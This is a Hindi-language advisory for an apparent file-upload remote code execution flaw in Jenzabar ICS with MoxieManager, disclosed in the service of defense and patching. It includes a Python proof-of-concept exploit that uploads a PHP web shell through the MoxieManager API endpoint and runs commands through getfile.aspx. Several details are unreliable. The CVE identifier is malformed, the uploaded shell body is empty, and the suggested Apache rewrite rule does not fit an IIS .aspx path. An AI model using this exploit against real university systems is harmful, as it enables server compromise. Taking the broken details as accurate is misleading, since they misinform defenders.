
CVE-2026-30-03 9.8 (गंभीर) Jenzabar ICS + MoxieManager में संभावित RCE
CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager
proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be
CVE CVSS प्रभाव प्रभावित CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager
Jenzabar ICS प्रणाली द्वारा उपयोग किए जाने वाले MoxieManager घटक में एक भेद्यता फ़ाइलों के अनुचित अपलोड की अनुमति दे सकती है, जो कुछ शर्तों के तहत सार्वजनिक रूप से एक्सेस की जा सकती हैं और संभावित रूप से रिमोट कोड निष्पादन (RCE) की ओर ले जा सकती हैं। तकनीकी विवरण
समस्या निम्न कारणों से उत्पन्न होती है:
अपलोड की गई फ़ाइलों का उचित सत्यापन न होना
सार्वजनिक एंडपॉइंट के माध्यम से फ़ाइलों का संभावित एक्सपोज़र:
/ICS/staticpages/getfile.aspx
एंडपॉइंट पर असंगत प्रमाणीकरण नियंत्रण:
/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx
विशिष्ट परिदृश्यों में, अपलोड की गई फ़ाइलें सुलभ निर्देशिकाओं में संग्रहीत की जा सकती हैं और बाद में पुनर्प्राप्त की जा सकती हैं।
प्रभाव फ़ाइलों का मनमाना अपलोड संवेदनशील सामग्री का एक्सपोज़र संभावित रिमोट कोड निष्पादन (सर्वर कॉन्फ़िगरेशन पर निर्भर) सिस्टम का पूर्ण समझौता
वर्गीकरण CVSS v3.1: 9.8 (गंभीर) वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434: बिना प्रतिबंध के फ़ाइल अपलोड CWE-284: अनुचित एक्सेस नियंत्रण
PoC एक्सप्लॉइट
#!/usr/bin/env python3
import requests
TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"
files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}
r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")
SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)
प्रभावित सिस्टम (33+ पुष्टि)
उपचार तत्काल (शमन):
DELETE /moxiemanager/files/users/*/shell.php
getfile.aspx को प्रतिबंधित करें:
RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]
MoxieManager अपलोड अक्षम करें